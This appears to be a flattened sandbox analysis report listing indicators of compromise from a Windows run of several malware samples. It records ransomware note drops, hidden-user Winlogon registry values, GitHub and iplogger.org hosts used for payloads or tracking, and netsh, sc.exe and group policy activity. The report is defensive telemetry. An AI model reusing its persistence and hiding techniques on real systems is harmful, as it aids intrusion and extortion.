description ioc Process File opened for modification C:\Users\Admin\Videos\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\Libraries\desktop.ini website ip grabber.exe File opened for modification C:\Program Files\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Searches\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\Desktop\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\Music\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\Documents\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\Downloads\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\Pictures\desktop.ini website ip grabber.exe File opened for modification C:\Program Files (x86)\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Links\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Music\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\Videos\desktop.ini website ip grabber.exe File opened for modification C:\Users\Public\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Documents\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini website ip grabber.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini website ip grabber.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs
flow ioc 272 raw.githubusercontent.com 284 camo.githubusercontent.com 510 raw.githubusercontent.com 511 raw.githubusercontent.com 550 raw.githubusercontent.com 604 raw.githubusercontent.com 529 raw.githubusercontent.com 273 raw.githubusercontent.com 495 iplogger.org 496 iplogger.org 565 raw.githubusercontent.com 577 raw.githubusercontent.com 499 raw.githubusercontent.com 500 raw.githubusercontent.com 592 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 320 bot.whatismyipaddress.com 436 ip-api.com -
Modifies WinLogon 2 TTPs 7 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" RDPWInst.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Azorult.exe -
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
-
AutoIT Executable 5 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00070000000280d5-3135.dat autoit_exe behavioral1/files/0x00070000000280fc-3288.dat autoit_exe behavioral1/files/0x0007000000028116-3421.dat autoit_exe behavioral1/memory/7732-10849-0x0000000000EF0000-0x0000000000FDC000-memory.dmp autoit_exe behavioral1/memory/7732-10896-0x0000000000EF0000-0x0000000000FDC000-memory.dmp autoit_exe -
Drops file in System32 directory 10 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy powershell.exe File created C:\Windows\SysWOW64\PrTecTor.exe Duksten.exe File opened for modification C:\Windows\SysWOW64\regedit.exe Duksten.exe File created C:\Windows\System32\.Xls.Vbs WScript.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini powershell.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI powershell.exe File created C:\Windows\System32\rfxvmt.dll RDPWInst.exe File created C:\Windows\SysWOW64\regedit.exe Duksten.exe File created C:\Windows\System32\Y.Htm.Vbs WScript.exe -
Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" reg.exe -
resource yara_rule behavioral1/files/0x000c000000028051-2032.dat upx behavioral1/memory/5380-2046-0x0000000000400000-0x0000000000476000-memory.dmp upx behavioral1/memory/5380-2063-0x0000000000400000-0x0000000000476000-memory.dmp upx behavioral1/files/0x0009000000028601-10677.dat upx behavioral1/memory/5740-10698-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/7732-10849-0x0000000000EF0000-0x0000000000FDC000-memory.dmp upx behavioral1/memory/5740-10856-0x0000000000400000-0x0000000000419000-memory.dmp upx behavioral1/memory/7732-10896-0x0000000000EF0000-0x0000000000FDC000-memory.dmp upx behavioral1/files/0x000b000000028748-12193.dat upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Paper.xml website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pl-pl\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\ui-strings.js website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sl-sl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforsignature.svg website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_tr_135x40.svg website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons.png website ip grabber.exe File created C:\Program Files\7-Zip\Lang\nn.txt.crypt.Vbs WScript.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\pages-app-tool-view.js website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as80.xsl website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ja-jp\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.png website ip grabber.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt website ip grabber.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\onenote.x-none.msi.16.x-none.boot.tree.dat website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sk-sk\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\Informix.xsl website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-default.svg website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-flag-dark.png website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png website ip grabber.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunec.jar website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\en-gb\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt website ip grabber.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\tools.jar website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\plugin.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hr-hr\ui-strings.js website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-tw\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png website ip grabber.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\en-US\about_Mocking.help.txt website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Candara.xml website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\EXCEL.VisualElementsManifest.xml website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\ui-strings.js website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sk-sk\ui-strings.js website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-140.png website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\hwrusash.dat website ip grabber.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_hover_18.svg website ip grabber.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\YOUR_FILES_ARE_ENCRYPTED.HTML website ip grabber.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] website ip grabber.exe -
Drops file in Windows directory 20 IoCs
description ioc Process File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_2063530968\manifest.fingerprint msedge.exe File created \??\c:\windows\mail.vbs Bugsoft.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_1905072323\manifest.json msedge.exe File created C:\Windows\m_regedit.exe Duksten.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_480630144\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_589384136\smart_switch_list.json msedge.exe File created \??\c:\windows\jk.bat Bugsoft.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_1905072323\manifest.fingerprint msedge.exe File created C:\windows\Program Files\Kazaa\My Shared Folder\Norton 2003 Pro.exe Gruel.a.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_480630144\nav_config.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_589384136\manifest.fingerprint msedge.exe File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_2063530968\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_480630144\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_589384136\manifest.json msedge.exe File opened for modification C:\Windows\logs\StorGroupPolicy.log svchost.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_1905072323\protocols.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping6708_589384136\office_endpoints_list.json msedge.exe File created C:\Windows\Y.Htm.Vbs WScript.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5916 sc.exe 5488 sc.exe 7240 sc.exe 2496 sc.exe 7836 sc.exe 3972 sc.exe 7036 sc.exe 324 sc.exe 7912 sc.exe 3884 sc.exe 3868 sc.exe 3120 sc.exe 5772 sc.exe 676 sc.exe 6640 sc.exe 7520 sc.exe 7732 sc.exe 7708 sc.exe 7888 sc.exe 4212 sc.exe 5948 sc.exe 5736 sc.exe 4528 sc.exe 3260 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3636 4432 WerFault.exe 763 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Anap.a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Funsoul.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chcp.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language butterflyondesktop.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 